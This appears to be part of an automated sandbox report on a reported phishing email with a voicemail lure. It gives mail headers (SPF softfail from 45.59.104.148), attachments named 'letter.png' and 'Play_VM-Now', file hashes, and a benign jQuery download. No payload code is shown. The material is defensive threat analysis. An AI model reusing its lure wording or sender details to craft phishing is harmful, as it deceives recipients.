                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (32030)
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):86709
                                                                                                                                                                                                                              Entropy (8bit):5.367391365596119
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                              MD5:E071ABDA8FE61194711CFC2AB99FE104
                                                                                                                                                                                                                              SHA1:F647A6D37DC4CA055CED3CF64BBC1F490070ACBA
                                                                                                                                                                                                                              SHA-256:85556761A8800D14CED8FCD41A6B8B26BF012D44A318866C0D81A62092EFD9BF
                                                                                                                                                                                                                              SHA-512:53A2B560B20551672FBB0E6E72632D4FD1C7E2DD2ECF7337EBAAAB179CB8BE7C87E9D803CE7765706BC7FCBCF993C34587CD1237DE5A279AEA19911D69067B65
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              URL:https://code.jquery.com/jquery-3.1.1.min.js
                                                                                                                                                                                                                              Preview:/*! jQuery v3.1.1 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.1.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.con

                                                                                                                                                                                                                              Static File Info

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              File type:RFC 822 mail, ASCII text, with very long lines (1945), with CRLF line terminators
                                                                                                                                                                                                                              Entropy (8bit):0.5109083887458643
                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                              • E-Mail message (Var. 5) (54515/1) 100.00%
                                                                                                                                                                                                                              File name:phish_alert_sp2_2.0.0.0.eml
                                                                                                                                                                                                                              File size:3'463'867 bytes
                                                                                                                                                                                                                              MD5:bb962929c157350d540d994b955e1a71
                                                                                                                                                                                                                              SHA1:f71415ca3b1f323eb8defeb1e70ac0349f7159c3
                                                                                                                                                                                                                              SHA256:d7a7449713fba2570d6b4c1170e32b2bc075bf974a1d63b021b279c25ab8aebc
                                                                                                                                                                                                                              SHA512:ac80739d09656cf91d1115c958e9650e2900de6c185e8b44f422165e0727808af9182aef4f926692875354fdf446633727594c3ff8032cf81bfb534c0a3a4531
                                                                                                                                                                                                                              SSDEEP:1536:00KnrN0mhUSD87HwAeCEp+65NUXKd20RMeVCOO+6RRrhOANQMBynjJdvvyVaiU6H:00QrmmhY7Q7quV2FoG
                                                                                                                                                                                                                              TLSH:78F5C5724ED67FC16B460DC4562CFF514CA82B8BA148B19770CC73E5ADA9430AF689BC
                                                                                                                                                                                                                              File Content Preview:Received: from BY1PR16MB6455.namprd16.prod.outlook.com (::1) by.. MW6PR16MB5523.namprd16.prod.outlook.com with HTTPS; Wed, 26 Mar 2025.. 18:50:16 +0000..Received: from BYAPR05CA0065.namprd05.prod.outlook.com.. (2603:10b6:a03:74::42) by BY1PR16MB6455.nampr

                                                                                                                                                                                                                              Static Mail

                                                                                                                                                                                                                              General

                                                                                                                                                                                                                              Subject:Caller left VM MSg 9d990faa8698952ce94734c9664e9e8b58ed88fe Duration-01:92:04
                                                                                                                                                                                                                              From:jmckula@infolineinc.com
                                                                                                                                                                                                                              To:Jeremy Mall <jmall@murexltd.com>
                                                                                                                                                                                                                              Cc:
                                                                                                                                                                                                                              BCC:
                                                                                                                                                                                                                              Date:Wed, 26 Mar 2025 18:50:01 +0000
                                                                                                                                                                                                                              Communications:
                                                                                                                                                                                                                              Attachments:
                                                                                                                                                                                                                              • letter.png
                                                                                                                                                                                                                              • Play_VM-Now
                                                                                                                                                                                                                              Key Value
                                                                                                                                                                                                                              Receivedfrom [127.0.0.1] (45.59.104.148) by MN1PEPF0000F0E0.mail.protection.outlook.com (10.167.242.38) with Microsoft SMTP Server (version=TLS1_3, cipher=TLS_AES_256_GCM_SHA384) id 15.20.8534.20 via Frontend Transport; Wed, 26 Mar 2025 18:50:01 +0000
                                                                                                                                                                                                                              Arc-Seali=1; a=rsa-sha256; s=arcselector10001; d=microsoft.com; cv=none; b=gZ/i97ngMkatHCU40NdymPj/tRO05hwQH39xplXprZ67LUfvctA0PU+DuPRe3uDpMyp/FS1TGhh1QBMiAWj3rkOYLQnnKUSP2OeUPxZcX6FuhlnqSQCJ6C0GEAzRvTOgTb/Id3uBlB6KPd9ioGGYsfLzgDEhj1o4Ft69sstPy/YTTcvgC0ZDJ6zmC3gkCJwVP7lKMjV5JdFO0ys5LsJ+HtSuJsxoeHFqbMiK1TNn2wHvW4dVK2JUltsIfHKbG8oo5Drryy72qOdP7JUn3wWZ1gi5tCCWAZyZXDzl+NxZkLp0kAzVob/NALs5nfHndcP3u5PvEFfSC+ocN2yPIFiPCw==
                                                                                                                                                                                                                              Arc-Message-Signaturei=1; a=rsa-sha256; c=relaxed/relaxed; d=microsoft.com; s=arcselector10001; h=From:Date:Subject:Message-ID:Content-Type:MIME-Version:X-MS-Exchange-AntiSpam-MessageData-ChunkCount:X-MS-Exchange-AntiSpam-MessageData-0:X-MS-Exchange-AntiSpam-MessageData-1; bh=iTPDm5x9jEcSLxixTHtMJMDsAD/3dfr/DeLtsWbY0nY=; b=DXj8GyhVIRq4BTK8fJa2i3oxel2/f3wCkAHYWUnQ7oVDv4sgyZLVPWUtOo7Pmi2HsnlLy95axALhMzI4HD0ieetrBTw06vPPgp/CIQBDjtdskZATpd55skumAPNyW4yVnMdeXuVaknz22U+wYx0J1GogpJg9HQGZBM1xF6BBOz8xQyguBQTHmQbZRh2p4bEU2ttBAO2+oiwtQHmdjlCoLgsZ1Kk4qOgz9dwRkIOB8rAUjiysVHf4t+564GaGI11wYR5JA8kM5uXQtXiQDJoh68dG3PLnj57TI2ctw5LdFniGMPAHeC0ckGkzCQRFKyfGzU3lBjtpWJaybinx0XYjTQ==
                                                                                                                                                                                                                              Arc-Authentication-Resultsi=1; mx.microsoft.com 1; spf=softfail (sender ip is 45.59.104.148) smtp.rcpttodomain=murexltd.com smtp.mailfrom=infolineinc.com; dmarc=none action=none header.from=infolineinc.com; dkim=none (message not signed); arc=none (0)
                                                                                                                                                                                                                              Authentication-Resultsspf=pass (sender IP is 2a01:111:f403:2405::725) smtp.mailfrom=infolineinc.com; dkim=pass (signature was verified) header.d=infolineincdc.onmicrosoft.com;dmarc=bestguesspass action=none header.from=infolineinc.com;compauth=pass reason=109
                                                                                                                                                                                                                              Received-SpfSoftFail (protection.outlook.com: domain of transitioning infolineinc.com discourages use of 45.59.104.148 as permitted sender)
                                                                                                                                                                                                                              Dkim-Signaturev=1; a=rsa-sha256; c=relaxed/relaxed; d=infolineincdc.onmicrosoft.com; s=selector2-infolineincdc-onmicrosoft-com; h=From:Date:Subject:Message-ID:Content-Type:MIME-Version:X-MS-Exchange-SenderADCheck; bh=iTPDm5x9jEcSLxixTHtMJMDsAD/3dfr/DeLtsWbY0nY=; b=6aI/IDIPuoPES5+R3UBlFQ7J9wnS/mBjJm2xInqAmhiLUmmrz7he89fvRc8qQUG5gcghGZDhnke9dSr9MpRnForqJHvUPEAX7YSZfJOPdZTADFfn6ncY97vZtP/oN6w996TDbYDTp7HMMkCZq4F8hcS1TtzIMT5MKl4jItY8j00=
                                                                                                                                                                                                                              X-Ms-Exchange-Authentication-Resultsspf=softfail (sender IP is 45.59.104.148) smtp.mailfrom=infolineinc.com; dkim=none (message not signed) header.d=none;dmarc=none action=none header.from=infolineinc.com;
                                                                                                                                                                                                                              Fromjmckula@infolineinc.com
                                                                                                                                                                                                                              ToJeremy Mall <jmall@murexltd.com>
                                                                                                                                                                                                                              SubjectCaller left VM MSg 9d990faa8698952ce94734c9664e9e8b58ed88fe Duration-01:92:04
                                                                                                                                                                                                                              Message-Id<4ff3cc1c-ae91-fee1-7075-907a925562eb@infolineinc.com>
                                                                                                                                                                                                                              DateWed, 26 Mar 2025 18:50:01 +0000
                                                                                                                                                                                                                              MIME-Version1.0
                                                                                                                                                                                                                              Content-Typemultipart/mixed; boundary="----sinikael-?=_1-17430151056150.7350743947055189"
                                                                                                                                                                                                                              Return-Pathjmckula@infolineinc.com
                                                                                                                                                                                                                              X-Eopattributedmessage1
                                                                                                                                                                                                                              X-Ms-Traffictypediagnostic MN1PEPF0000F0E0:EE_|DS0PR22MB4070:EE_|SN1PEPF000397B0:EE_|BY1PR16MB6455:EE_|MW6PR16MB5523:EE_
                                                                                                                                                                                                                              X-Ms-Office365-Filtering-Correlation-Id 8650287d-c060-4219-e409-08dd6c97078f
                                                                                                                                                                                                                              X-Ms-Exchange-Senderadcheck1
                                                                                                                                                                                                                              X-Ms-Exchange-Antispam-Relay0
                                                                                                                                                                                                                              X-Microsoft-Antispam-Untrusted BCL:0;ARA:13230040|36860700013|34070700014|82310400026|376014|61400799027|4076899003|4053099003|8096899003;
                                                                                                                                                                                                                              X-Microsoft-Antispam-Message-Info-Original TrcZBSR4cqb6uyMZhn1w2hhrMFSpwDqZhOgl4Wa+qOrCQ5KF1K7yAMrGCVy/uRIKFKqQiUMwoj/ypEia4/g5uZ0lXOPDzuGW1MxEm8Y7oSq4t7JbCXzYZigPnFSbpdxVVZ7xK1ZvrYaHYUdGOhMuMh8gbxbSfi9k1eybgQjyLGl+DI3Mgt+H8mshLUR3S1a0n4Un3yewsqFPjyvoBGelkeRlt+NLXIEnbJgmgNJyHjpGn1tmlfrjzx6zj2oNR4ux6kChSuHW5eeH1zhAUc8A7y/KNQLHvRPR8SvS6xUafL44dxfQbTANzKLKMNOa+lob+rEpfrhQ5lkFFwjFrLhGBzJp33q+HDVz4xdFV6svF2RaVSHB6ZODUNgqX4eC8frhOiVppSWGiCsWkmFJoPu2BXsVCQjCzmMqcL/jMB1hVPoqBPynJKaefYof7dJa6/2Tqf15tUGuF6uFPeRE+oty/uAbcMKxf5ZiGuF0LncXItsFyRzCNf7WlE5V7BQUBzKEKvSa0k1oeX+z9M+myFpmXZJ1AKHuwJb9AI/amiiBDhnCJE5VR0i+36IbbaPci4EtvmhFWeJV0PDYOfTydrG+h2xDk3OsTq3A2rE4otpTNQs34CNDc4gUAvSZfM8QnD9LfeDwmeTm9SLgq+SumZyPIJ2vW76kT7IoRwy1Boq4wQw2/+TL3a5IYwL3lRFqRYAEZCSEzYCsvX4raF3GZDb4OfsBgusnmJ7Ct4FBsaC0C58eThyTF/0kgZWI42YZ4cjEtfUgK5I1YrG5TQw9KhB068TcLUPvEAnnlQECltNLGnqE21YSiXSRGVnzEJHEkM0L3CR9hLUEW8W2RrQIc/hlxu4tEP+BNVragHvEEPMWbW7oQUSA+7q8JphtWVmjO43aFkVavh4tH2qy8gS5sFj0cAcl3Z5j229xPOQ4dS/e7k1lzgYFHe4QXNTJqlx4HNDKEhewTzUrBlbTd7vXFksgXVfO4I63FYyZ0JjRvwIx5S+u2R92pVyaQdWOnG8w369BaPVyEU0TqgdFfZFyLvpnYVwAc90LAaVEk10aI1TZEFvpepdd1Tr9OTvwR6jxWsvtF8T802rO3PFh1N4BXQ4MMiWjUmtV97hhlOt51IdC8IapMcfd+hzgeOQxG5xonh6wt+xQ2qGkk0ZSvRAlutoKi2YCfP/elMgLhxRlDMWutD41yNsIEJWds98eTMuXVM22FAyoWy9fYglgm0gAyCC4ow==
                                                                                                                                                                                                                              X-Forefront-Antispam-Report-Untrusted CIP:45.59.104.148;CTRY:US;LANG:en;SCL:1;SRV:;IPV:NLI;SFV:NSPM;H:[127.0.0.1];PTR:InfoDomainNonexistent;CAT:NONE;SFS:(13230040)(36860700013)(34070700014)(82310400026)(376014)(61400799027)(4076899003)(4053099003)(8096899003);DIR:OUT;SFP:1102;
                                                                                                                                                                                                                              X-Ms-Exchange-Transport-CrosstenantheadersstampedBY1PR16MB6455
                                                                                                                                                                                                                              X-Ms-Exchange-Organization-Expirationstarttime26 Mar 2025 18:50:07.9210 (UTC)
                                                                                                                                                                                                                              X-Ms-Exchange-Organization-ExpirationstarttimereasonOriginalSubmit
                                                                                                                                                                                                                              X-Ms-Exchange-Organization-Expirationinterval1:00:00:00.0000000
                                                                                                                                                                                                                              X-Ms-Exchange-Organization-ExpirationintervalreasonOriginalSubmit
                                                                                                                                                                                                                              X-Ms-Exchange-Organization-Network-Message-Id 8650287d-c060-4219-e409-08dd6c97078f
                                                                                                                                                                                                                              X-Eoptenantattributedmessaged5ea0ba6-3c9e-43c2-9d1e-fffeb0d842e5:0
                                                                                                                                                                                                                              X-Ms-Exchange-Organization-MessagedirectionalityIncoming
                                                                                                                                                                                                                              X-Ms-Exchange-Transport-Crosstenantheadersstripped SN1PEPF000397B0.namprd05.prod.outlook.com
                                                                                                                                                                                                                              X-Ms-Exchange-Transport-Crosstenantheaderspromoted SN1PEPF000397B0.namprd05.prod.outlook.com
                                                                                                                                                                                                                              X-Ms-PublictraffictypeEmail
                                                                                                                                                                                                                              X-Ms-Exchange-Organization-Authsource SN1PEPF000397B0.namprd05.prod.outlook.com
                                                                                                                                                                                                                              X-Ms-Exchange-Organization-AuthasAnonymous
                                                                                                                                                                                                                              X-Ms-Office365-Filtering-Correlation-Id-Prvs 8f467c57-5d17-44f6-2919-08dd6c97042a
                                                                                                                                                                                                                              X-Ms-Exchange-AtpmessagepropertiesSA|SL
                                                                                                                                                                                                                              X-Ms-Exchange-Organization-Scl1
                                                                                                                                                                                                                              X-Microsoft-Antispam BCL:0;ARA:13230040|5073199012|4073199012|35042699022|8096899003|4076899003|4053099003|43540500003;
                                                                                                                                                                                                                              X-Forefront-Antispam-Report CIP:2a01:111:f403:2405::725;CTRY:;LANG:en;SCL:1;SRV:;IPV:NLI;SFV:NSPM;H:NAM02-DM3-obe.outbound.protection.outlook.com;PTR:mail-dm3nam02on20725.outbound.protection.outlook.com;CAT:NONE;SFS:(13230040)(5073199012)(4073199012)(35042699022)(8096899003)(4076899003)(4053099003)(43540500003);DIR:INB;
                                                                                                                                                                                                                              X-Ms-Exchange-Crosstenant-Originalarrivaltime26 Mar 2025 18:50:07.4679 (UTC)
                                                                                                                                                                                                                              X-Ms-Exchange-Crosstenant-Network-Message-Id 8650287d-c060-4219-e409-08dd6c97078f
                                                                                                                                                                                                                              X-Ms-Exchange-Crosstenant-Idd5ea0ba6-3c9e-43c2-9d1e-fffeb0d842e5
                                                                                                                                                                                                                              X-Ms-Exchange-Crosstenant-Originalattributedtenantconnectingip TenantId=e9b312a7-66dc-4030-a016-c098ad24077d;Ip=[45.59.104.148];Helo=[[127.0.0.1]]
                                                                                                                                                                                                                              X-Ms-Exchange-Crosstenant-Authsource SN1PEPF000397B0.namprd05.prod.outlook.com
                                                                                                                                                                                                                              X-Ms-Exchange-Crosstenant-AuthasAnonymous
                                                                                                                                                                                                                              X-Ms-Exchange-Crosstenant-FromentityheaderInternet
                                                                                                                                                                                                                              X-Ms-Exchange-Transport-Endtoendlatency00:00:08.9206117
                                                                                                                                                                                                                              X-Ms-Exchange-Processed-By-Bccfoldering15.20.8534.033
                                                                                                                                                                                                                              X-Microsoft-Antispam-Mailbox-Delivery ucf:0;jmr:0;auth:0;dest:I;ENG:(910005)(944506478)(944626604)(4710137)(4712040)(4999020)(920097)(930097)(140003);
                                                                                                                                                                                                                              X-Microsoft-Antispam-Message-Info BtwWXfFlw7joHeyBgHqU6hKadHih7+OtYTrzSO3CBUAUFIaZzq03cUXklFe5YC96diFdkDx+PEhkouUfy7jaYqgSGDAA5O/QF6jiomda44uyyTeczsprk/DTkRpHlNTe2kAIhRufD/hCvWYXU3xg3fm2gknk3Sn8+xf/5mi36nPt0RI0nhGh2lPKYyTxP8nVkDlmfat+sAGbmqm4RdHzvlmt53YgLk2QWJIQut9ib4VOgX26JsQ6LeO0a5hHt0xwaYR8Ok1mkwjoDF/v3nCl6R4yT8qEcUEKqknOZiJ4OyUHjjxLjldW7kf9XVRYfNkmzNDY0sPaB2OBHBvKmu3CH4ZxSawckSSKR2HZnH+FX5V1wLllqc6q7dh+0GCx/PDC03VGphrdZZiASDjFsx+5xl2cSuiiKHfgIuyuEi1R+JAMoKYvwp6mq70U9+RbfNX8i9+ClK46XcZUlgEUMtqy+LWcfB2jQ7Mjw4to2McY8WF4yQRZ/+ZkKpz7imZpOtf1CsWL137WiRlIdMh5MGRdz6K26+WLZ2cAr7AgCnYp8d9HygXSdO59m4p2uKUHE9WkP3+AH6hhjqdx8/QBdaKcQJT6XqgsPYTxTPh5WYn/GA3dtgJod0t5Qo2+D+G+zhHtSBMQV9861RgmIBN5/aH4hgs2lJT0PpN/Wa7rUtG289iI+2bgE0AVyX0AZGXUGaUCuyrhvCBClh+8Ua5TUZ9U5J9759Y26gBdRYCYaWuSy2VkUlIYQrXBxVZzYnr2jz/FRA98qEDsTjV/Wtws5sikaIV2gHXDErVZmJP9Ky8dlL8ET2cUrF8qAIRSNqZNbf4Zoa+OTSwdIL4CE2dtcky+SWKpXRMBz2krfNaSk4Q6KcVemYjY5jaiOAQxlno9MfWOu3xP/bWExR6LQ0/E9eK2jnYVmfQJ4KboLVO3OUV6ih1PsLgsSjzqIXMCCod+G+M1Yj0ObkNkcrvANDPInmsLAl/+yov57NY0s60Ft1eai7WYnOdspuZrfElGMiGxM5STWUA3wsFkwq+iw2EhV+T7i69Nw/Bxd3loiwYYcEybZb8ux3wOilsqhed/8HmC9jHHehWzk3HcIiWXPM4CLX95KfPmk5cQCcQmeFv2CiTfxgr+zffY2ag20bQpFIIQPanO0EFcvox5FnK8paHbB3Ngrjnv8sLTz+sdvL7Ev0kFaJm/pUHrwApgGeW0wb1uGte9eqQ4Q7KT7ze7uO6Fm5lmH2kH2qT/eASedLM0j3h9fsad0WnUvU9CwcKrThwgQUETlcCCcaCLs/stO4pmTyNCttc18PzxcnPkxLcFwamHTSaGP4sO3E1FKXkQxdLOPQdHCob2fBBOv3CqeEbDgzNGniK6N6aEUGZBCr1PvP4zZuOtBm/pBaAvraVOgNwXL2Ha7q4WJsqiiq1kLi+Myxy1ebin/WuKEdQxUao9pEHClY9de5yriRGGPgHKY0pXM21D0N344gJGbAnyPgew3YMlSv6YIEhYA0TocBn6cx0xR4iHDICLg84B2h02VUwGrRzCj+nnFyfp72vOGk09RsgbwwgZ5Nz+Q6fLuel1TOYj7M/BxjbJ+mmtVYBFAFzt77gnxvJIa7tIth8UeVUVi24QJ7frSGkBVzG6nWCFU8dtHFqmkSaYfqkp7k9NFLJsPF4LJrYOD798c6fEeD2Tkxv0ELfmdiEt67/cXDBViwDH0pEWwlQn1lf8Ypae3LrgNH15a0zcg9kGvxfXnvb4INyI/S4UH+keKbsY4W3NvbtceUYoKQvzP5dv92WSu53mde1kUdcAnh/p6Jec8guRZGq180/7BBmUs9HbkAtU0x0kSs5BvaIztXFoE9hWGXqIefYkWbwSQlXNFIiPRIpbm/6LbB9BGXa+hKQP+sZiHimmJl8qPCQb56LTReUu77QeV4XytmMco/CpU9mCUxX7HjIvOQ==
                                                                                                                                                                                                                              Content-Transfer-Encoding7bit

                                                                                                                                                                                                                              File Icon

                                                                                                                                                                                                                              Icon Hash:46070c0a8e0c67d6